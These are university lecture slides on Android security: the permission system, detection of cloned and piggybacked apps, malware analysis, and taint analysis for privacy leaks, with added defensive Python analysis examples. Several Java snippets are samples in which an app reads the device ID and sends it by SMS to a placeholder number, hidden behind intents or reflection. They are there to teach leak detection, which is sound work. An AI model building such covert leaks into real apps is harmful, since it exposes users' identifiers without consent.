
FIT5003 Software Security
Mobile Security II
1

Android Permission System
– activity
  – restricts access to the activity
  – checked when starting the activity
  – throws SecurityException if the caller does not have the required permission
– service
  – restricts who can start, stop or bind to the service
– receiver
  – restricts who can send broadcasts to the BroadcastReceiver
  – checked at delivery, after the broadcast was sent
  – does not throw an exception in case of permission failure
– provider
  – restricts who can access the data
  – read and write permissions
  – checked when performing operations (e.g. query, insert)
2

Android Permission System
– Android Framework Security
  – Mandatory Access Control (MAC) enforced by middleware
  – Components protected using access permission labels
    – declared in the AndroidManifest file
    – cannot be changed after installation
  – 4 protection levels
    – normal – always granted
    – dangerous – requires user approval
    – signature – matching certificate
    – signature or system – matching certificate with system
3

Android Permission System
– At install time each application requests a list of permissions
– All permissions must be granted at install time – all or nothing
– Protect access to Android components, services and APIs, e.g. the API for access to the phone's hardware
– ∼130 API-defined permissions in the Manifest.permission class
– Custom-defined permissions by developers
  – name conflicts may appear
  – current research on Android permissions doesn't take them into consideration
4


Examples of Permissions
– INTERNET (string: “android.permission.INTERNET”)
– ACCESS_NETWORK_STATE, ACCESS_WIFI_STATE, CHANGE_NETWORK_STATE, READ_PHONE_STATE
– ACCESS_COARSE_LOCATION, ACCESS_FINE_LOCATION
– READ_SMS, RECEIVE_SMS, SEND_SMS
– ANSWER_PHONE_CALLS, CALL_PHONE, READ_CALL_LOG, WRITE_CALL_LOG
– READ_CONTACTS, WRITE_CONTACTS
– READ_CALENDAR, WRITE_CALENDAR
– READ_EXTERNAL_STORAGE, WRITE_EXTERNAL_STORAGE
– RECORD_AUDIO, CAMERA
– BLUETOOTH, NFC
– RECEIVE_BOOT_COMPLETED
– SYSTEM_ALERT_WINDOW
– SET_WALLPAPER
6

{READ,WRITE}_EXTERNAL_STORAGE
– Each app has access to a private directory
  – No other apps can access this directory *
– The device offers an “external storage”
  – In the past: a physical “removable” SD card
  – Currently: part of the file system that apps can use to share files: “/sdcard”
7

RECEIVE_BOOT_COMPLETED
– When the system boots, it broadcasts an Intent with the “ACTION_BOOT_COMPLETED” action
– An app can declare an intent filter for this intent so that it can automatically start at boot!
– Useful to gain persistence / survive reboots
– And that’s why the Android folks added a permission requirement
– Note: the app needs to be manually started to receive it
8

SYSTEM_ALERT_WINDOW
– Draw arbitrary windows/overlays on top of other apps
  – Can be completely custom: position, shape, content, transparency
  – Can be clickable ⊕ passthrough
– It leads to many UI attacks
  – UI confusion, clickjacking, phishing
  – Teaser: Cloak & Dagger
9

Permission Granting
– Normal permissions
  – no explicit granting necessary
– Dangerous permissions
  – The user needs to be asked
– Signature permissions
  – It depends
  – Granted at install time when the app is signed by the same certificate as the defining app
  – Otherwise, the user is asked
– Not all of these are available to third-party apps
10

Permission Request






11

Custom Permissions (doc)
– Apps can define “custom” permissions!
– The “system” permissions are defined in the same way
  – AndroidManifest.xml
12

Components Permission Enforcement
– Apps’ components can specify which permissions are required to use them
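The component-level enforcement described on the permission slides (permissions declared in AndroidManifest.xml, the four protection levels, and each activity/service/receiver/provider able to require a permission) can be checked mechanically. The following is an added example, not code from the lecture: it parses a constructed manifest (package, permission and component names are made up) and flags exported components that any third-party app could reach because they require no permission or only a normal one.

```python
import xml.etree.ElementTree as ET

ANDROID = "{http://schemas.android.com/apk/res/android}"
COMPONENTS = ("activity", "service", "receiver", "provider")

# Constructed sample manifest (not a real app): one custom permission is
# only 'normal' and one exported receiver requires no permission at all.
MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.demo">
  <permission android:name="com.example.demo.READ_DATA"
              android:protectionLevel="signature"/>
  <permission android:name="com.example.demo.CONTROL"
              android:protectionLevel="normal"/>
  <application>
    <provider android:name=".DataProvider" android:exported="true"
              android:readPermission="com.example.demo.READ_DATA"
              android:writePermission="com.example.demo.READ_DATA"/>
    <service android:name=".ControlService" android:exported="true"
             android:permission="com.example.demo.CONTROL"/>
    <receiver android:name=".BootReceiver" android:exported="true"/>
    <activity android:name=".MainActivity" android:exported="false"/>
  </application>
</manifest>"""


def audit(manifest_xml):
    """Return sorted (component, attribute, reason) findings for exported
    components any app can reach: no permission, or only a 'normal' one.
    Simplification: only an explicit android:exported="true" counts as
    exported (the real default depends on intent filters and target SDK)."""
    root = ET.fromstring(manifest_xml)
    levels = {p.get(ANDROID + "name"): p.get(ANDROID + "protectionLevel", "normal")
              for p in root.iter("permission")}
    findings = []
    for tag in COMPONENTS:
        for comp in root.iter(tag):
            if comp.get(ANDROID + "exported") != "true":
                continue
            name = comp.get(ANDROID + "name")
            # providers check read and write separately, falling back to
            # android:permission; the other component types use one attribute
            attrs = ("readPermission", "writePermission") if tag == "provider" else ("permission",)
            for attr in attrs:
                perm = comp.get(ANDROID + attr) or comp.get(ANDROID + "permission")
                if perm is None:
                    findings.append((name, attr, "no permission required"))
                elif levels.get(perm) == "normal":   # undeclared (platform) perms are skipped
                    findings.append((name, attr, perm + " is only 'normal'"))
    return sorted(findings)
```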





13

Android Permission System
– Are users paying attention to the permissions?
– Do users understand the permissions?
– Can users make correct security decisions?
Figure labels: Stowaway [1], PScout [2], Bartel et al. [3]
[1] Felt, Adrienne Porter, Erika Chin, Steve Hanna, Dawn Song, and David Wagner. “Android permissions demystified.” In Proceedings of the 18th ACM Conference on Computer and Communications Security (CCS 2011), pp. 627-638. ACM, 2011.
[2] Kathy Wain Yee Au, Yi Fan Zhou, Zhen Huang and David Lie. “PScout: Analyzing the Android Permission Specification.” In Proceedings of the 19th ACM Conference on Computer and Communications Security (CCS 2012). 2012.
[3] Alexandre Bartel, Jacques Klein, Martin Monperrus, Yves Le Traon. “Static Analysis for Extracting Permission Checks of a Large Scale Framework: The Challenges and Solutions for Analyzing Android.” IEEE Transactions on Software Engineering (TSE), 2014.
14

Android Permission System
15

Android Permission System
16

Identifying Mobile Security Issues
17

Mobile Security
Static Analysis / Dynamic Analysis
Tan, Darell JJ, Tong-Wei Chua, and Vrizlynn LL Thing. “Securing android: a survey, taxonomy, and challenges.” ACM Computing Surveys (CSUR) 47, no. 4 (2015): 58.
18

Mobile Security
STRIDE
A Taxonomy and Qualitative Comparison of Program Analysis Techniques for Security Assessment of Android Software
Alireza Sadeghi, Hamid Bagheri, Joshua Garcia, and Sam Malek
IEEE Transactions on Software Engineering (TSE), Vol. 43, Issue 6, June 2017
19

Mobile Security
20

Mobile Security
– Clone Detection
– Malware Analysis
– Privacy Leak
21

Clone Detection
Figure: Original App (Carrier) + Hook + Malicious Payload (Rider) = Piggybacked App
Wu Zhou, Yajin Zhou, Michael Grace, Xuxian Jiang, and Shihong Zou. Fast, scalable detection of “piggybacked” mobile applications. In CODASPY ’13, pages 185–196, New York, NY, USA, 2013
22

Clone Detection
– Cloning is the process of building software by reverse engineering another piece of software or by re-implementing it based on documentation or usage experience.
– Repackaging refers to the core process of unpacking a software package, then repackaging it after a probable modification of the decompiled code and/or of other resource files (e.g. logos, permission list, etc.).
– Piggybacking is defined in the literature as a malware development activity where a given benign app is repackaged to include a malicious payload. Piggybacked apps thus constitute a subset of repackaged apps.
23

Clone Detection
– Similarity Comparison
– Symptom Discovery
– (Un)Supervised Learning
– Runtime Monitoring
24

Clone Detection
Similarity Computation Algorithms
25

Clone Detection
Plugin-based Framework
Li, Li, Tegawendé F. Bissyandé and Jacques Klein. “SimiDroid: Identifying and Explaining Similarities in Android Apps.” 2017 IEEE Trustcom/BigDataSE/ICESS (2017): 136-143.
26
https://github.com/lilicoding/SimiDroid

Clone Detection
Comparison levels: Method, Component, Resource
27

Clone Detection
– identical: both key and value are exactly the same
– similar: same key but different value
– new: key is new
– deleted: key is deleted
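As an added illustration of the identical/similar/new/deleted classification above (not SimiDroid's own code), the following compares the method-level keys of two constructed apps, where each value stands in for a fingerprint of the method body. The score formula identical / (total minus new) is an assumption chosen so that code injected by a repackager does not dilute how much of the original app survives unchanged.

```python
def compare(app_a, app_b):
    """Classify every method key of two apps (key -> body fingerprint)
    into identical / similar / new / deleted, as in the slide above."""
    result = {"identical": [], "similar": [], "new": [], "deleted": []}
    for key in sorted(app_a.keys() | app_b.keys()):
        if key in app_a and key in app_b:
            kind = "identical" if app_a[key] == app_b[key] else "similar"
        elif key in app_b:
            kind = "new"          # only in the suspected clone
        else:
            kind = "deleted"      # only in the original
        result[kind].append(key)
    return result


def similarity_score(report):
    """Assumed scoring: identical / (total - new). Added code, injected by
    the repackager, is left out of the denominator on purpose."""
    counts = {k: len(v) for k, v in report.items()}
    denom = sum(counts.values()) - counts["new"]
    return counts["identical"] / denom if denom else 0.0


# Constructed pair: APP_B is APP_A with an ad id constant replaced, a new
# method injected and one method removed (change patterns 1 and 2 on the
# following slides). Fingerprints are made-up stand-ins for body hashes.
APP_A = {
    "Start.callAdds()": "h1",
    "Start.onCreate(Bundle)": "h2",
    "Util.log(String)": "h3",
    "Util.unused()": "h4",
}
APP_B = {
    "Start.callAdds()": "h1-modified",   # constant string replaced
    "Start.onCreate(Bundle)": "h2",
    "Util.log(String)": "h3",
    "Payload.run()": "h9",               # new method
}
```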
28

Clone Detection
Symptom Discovery
Symptom Discovery builds on the intuitive assumption that repackaging processes leave marks on the repackaged apps. If such marks can be fully characterized, it is possible to spot the symptoms in apps.
AndroidSOO has recently introduced and explored a novel and easily extractable attribute called String Offset Order, which is extracted from the string identifier list in the classes.dex bytecode file.
29

Clone Detection
(Un)Supervised Learning
30

Clone Detection
Watermarking / Birthmarking
Runtime Monitoring
31

Clone Detection
Detecting Clone Apps / Understanding Cloning in Android
32

Clone Detection
(1) Constant String Replacement.
class Start extends Activity {
  void callAdds() {
    $r1 = $r0.;
-   virtualinvoke $r1.setAdUnitId("a1522d5c390a573");
+   virtualinvoke $r1.setAdUnitId(String)("ca-app-pub-8182614411920503/1232098473");
  }
}
33

Clone Detection
(1) Constant String Replacement. (2) New Method Call.
class UnityPlayerProxyActivity extends Activity {
  protected void onCreate(Bundle) {
    specialinvoke $r0.onCreate($r1);
    $r2 = newarray (java.lang.String)[2];
+   staticinvoke ($r0);
  }
}
34

Clone Detection
– (1) Constant String Replacement.
– (2) New Method Call.
– (3) Library Impact.
35


Clone Detection
(1) Constant String Replacement. (2) New Method Call.
(3) Library Impact.
(4) Duplicated Component Capabilities.
receiver: "com.kuguo.ad.MainReceiver"
  intent-filter
    action: "android.net.conn.CONNECTIVITY_CHANGE"
receiver: "net.crazymedia.iad.AdPushReceiver"
  intent-filter
    action: "android.net.conn.CONNECTIVITY_CHANGE"
37

Malware Analysis
38

Malware Analysis
39

Malware Analysis
40

Malware Analysis
41

Malware Analysis
Machine Learning-based Malware Detection
42

Malware Analysis
Example: CHABADA
43

Malware Analysis
Example: CHABADA
44

Malware Analysis
Example: CHABADA
45

Privacy Leak
46

Privacy Leak
Taint Analysis
source
sink
47

Privacy Leak
public class Activity_A {
  void onCreate(Bundle b) {
    String id = telManager.getDeviceId();                 // source
    //...
    String alias = id;
    String number = "+3524666445556";
    sms.sendTextMessage(number, null, alias, null, null);  // sink
  }
}
48

Privacy Leak
FlowDroid: Precise Context, Flow, Field, Object-sensitive and Lifecycle-aware Taint Analysis for Android Apps
– Multiple Entrypoints
– Callback methods
49

Privacy Leak
Multiple Entrypoints
Main Launcher
50

Privacy Leak
Callback methods
51

Privacy Leak
Callback methods
52

Privacy Leak
Dummy main methods
53

Privacy Leak
54

Privacy Leak
55

Privacy Leak
Static Taint Analysis
Build Sound Call Graph
56

Privacy Leak
Figure: APP containing Activity_A and Activity_B; Activity_A calls the ICC method startActivity(), which passes through the Android Framework before Activity_B is reached
57

Privacy Leak
Figure labels: Activity_A, Activity_B
58

Activity_A
  String id = telManager.getDeviceId();                   // source
  Intent intent = new Intent(this, Activity_B.class);
  intent.putExtra("sensitive", id);
  startActivity(intent);                                  // Broken Call Graph (CFG): no edge into Activity_B
Activity_B
  void onCreate(Bundle b) {
    Intent intent = getIntent();
    String id = intent.getStringExtra("sensitive");
    String number = "+3524666445556";
    sms.sendTextMessage(number, null, id, null, null);    // sink
  }
59

Privacy Leak
IccTA
ICC Links Building: Resolving Intent Values (Constant String Propagation)
Activity_A {
  Intent: { targetcomp: Activity_B }
}
Call Graph Bridging
60

Privacy Leak
IccTA
ICC Links Building: ICC link Activity_A -> Activity_B
Call Graph Bridging
Activity_A
- startActivity(intent);
+ Activity_B a2 = new Activity_B(intent);
+ a2.dummyMain();
Activity_B
void dummyMain() {
  Intent i = getIntent(); // Lifecycle/Callback methods
}
61

Privacy Leak
Activity_A (ICC link)
- startActivity(intent);
+ Activity_B a2 = new Activity_B(intent);
+ a2.dummyMain();
Activity_B
private Intent intent = null;
public Activity_B(Intent intent) {
  this.intent = intent;
}
@Override
public Intent getIntent() {
  return this.intent;
}
void dummyMain() {
  Intent i = getIntent(); // Lifecycle/Callback methods
}
62
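The broken-call-graph problem and IccTA's bridging of startActivity() links, as an added toy taint tracker (not FlowDroid or IccTA code) over a constructed mini-IR of the Activity_A / Activity_B example: every component is analysed from its own dummy main, and with ICC bridging switched off the leak through the intent extra is missed.

```python
SOURCES = {"getDeviceId"}        # privacy-sensitive producers
SINKS = {"sendTextMessage"}      # data-exfiltrating consumers


def analyze(app, bridge_icc=True):
    """Return sorted (component, sink) pairs reached by tainted data.
    Every component is analysed from its own dummy main; startActivity()
    links are bridged like IccTA (bridge_icc=False keeps the graph broken)."""
    leaks, extra_facts = set(), set()     # extra_facts: (target, key) tainted
    pending, seen = list(app), set()
    while pending:
        comp = pending.pop()
        seen.add(comp)
        tainted, intents = set(), {}      # intents: var -> (target, {key: var})
        for stmt in app[comp]:
            op, rest = stmt[0], stmt[1:]
            if op == "call":              # dst = func(args)
                dst, func, args = rest
                arg_tainted = any(a in tainted for a in args)
                if func in SINKS and arg_tainted:
                    leaks.add((comp, func))
                if func in SOURCES or arg_tainted:
                    tainted.add(dst)
            elif op == "assign" and rest[1] in tainted:   # dst = src
                tainted.add(rest[0])
            elif op == "newIntent":       # explicit intent, constant target
                intents[rest[0]] = (rest[1], {})
            elif op == "putExtra":        # intent.putExtra(key, var)
                intents[rest[0]][1][rest[1]] = rest[2]
            elif op == "startActivity" and bridge_icc:
                target, extras = intents[rest[0]]
                new = {(target, k) for k, v in extras.items() if v in tainted}
                if target not in seen or not new <= extra_facts:
                    extra_facts |= new
                    if target not in pending:
                        pending.append(target)   # re-analyse with new facts
            elif op == "getExtra" and (comp, rest[1]) in extra_facts:
                tainted.add(rest[0])      # dst = getIntent().getStringExtra(key)
    return sorted(leaks)


# Constructed from the lecture's Activity_A -> Activity_B example.
APP = {
    "Activity_A": [("call", "id", "getDeviceId", []),
                   ("newIntent", "intent", "Activity_B"),
                   ("putExtra", "intent", "sensitive", "id"),
                   ("startActivity", "intent")],
    "Activity_B": [("getExtra", "id", "sensitive"),
                   ("assign", "number", "CONST"),
                   ("call", "_", "sendTextMessage", ["number", "id"])],
}
```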

Privacy Leak
Inter-Component Call Graph
63

Privacy Leak
Figure: APP containing Activity_A and Activity_B; Activity_A reaches Activity_B through a Reflective Method and through the ICC method startActivity()
64

Privacy Leak
String imei = telephonyManager.getDeviceId();            // source
Class c = Class.forName("de.ecspride.ReflectiveClass");
Object o = c.newInstance();
Method m = c.getMethod("setIme" + "i", String.class);
m.invoke(o, imei);
Method m2 = c.getMethod("getImei");
String s = (String) m2.invoke(o);
SmsManager sms = SmsManager.getDefault();
sms.sendTextMessage("+49 1234", null, s, null, null);    // sink
65

Privacy Leak
DroidRA
1) To infer target values of reflective calls.
   m.invoke(o, imei); // o.setImei(imei);
2) To replace reflective calls with traditional Java calls
66
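DroidRA's two steps as an added example (not DroidRA's code): a small constant propagation over a constructed mini-IR of the reflective snippet above infers the class and method names the reflective calls target, then rewrites newInstance()/invoke() into direct calls that a static taint analysis can follow. The statement tuple shapes are this example's own convention.

```python
def resolve_reflection(stmts):
    """Step 1: propagate string constants to learn which class/method each
    Class.forName / getMethod refers to.  Step 2: rewrite newInstance and
    invoke into direct statements; unresolvable calls are left unchanged."""
    consts = {}     # var -> known constant string
    classes = {}    # var -> resolved class name (from Class.forName)
    methods = {}    # var -> (class name, method name) (from getMethod)
    out = []
    for s in stmts:
        op = s[0]
        if op == "const":                                   # v = "literal"
            consts[s[1]] = s[2]
        elif op == "concat" and s[2] in consts and s[3] in consts:
            consts[s[1]] = consts[s[2]] + consts[s[3]]      # v = a + b
        elif op == "forName" and s[2] in consts:            # c = Class.forName(n)
            classes[s[1]] = consts[s[2]]
        elif op == "newInstance" and s[2] in classes:       # o = c.newInstance()
            out.append(("new", s[1], classes[s[2]]))        # -> o = new C()
            continue
        elif op == "getMethod" and s[2] in classes and s[3] in consts:
            methods[s[1]] = (classes[s[2]], consts[s[3]])   # m = c.getMethod(n)
        elif op == "invoke" and s[1] in methods:            # dst = m.invoke(o, args)
            cls, name = methods[s[1]]
            out.append(("call", s[3], s[2], name, s[4]))    # -> dst = o.name(args)
            continue
        out.append(s)
    return out


# Constructed from the lecture's snippet: getMethod("setIme" + "i", ...)
# Shapes: ("call", dst, receiver, name, args), ("invoke", m, o, dst, args)
STMTS = [
    ("call", "imei", "telephonyManager", "getDeviceId", []),
    ("const", "n", "de.ecspride.ReflectiveClass"),
    ("forName", "c", "n"),
    ("newInstance", "o", "c"),
    ("const", "a", "setIme"), ("const", "b", "i"), ("concat", "name", "a", "b"),
    ("getMethod", "m", "c", "name"),
    ("invoke", "m", "o", "_", ["imei"]),
    ("const", "g", "getImei"), ("getMethod", "m2", "c", "g"),
    ("invoke", "m2", "o", "s", []),
    ("call", "_", "sms", "sendTextMessage", ["+49 1234", "s"]),
]
```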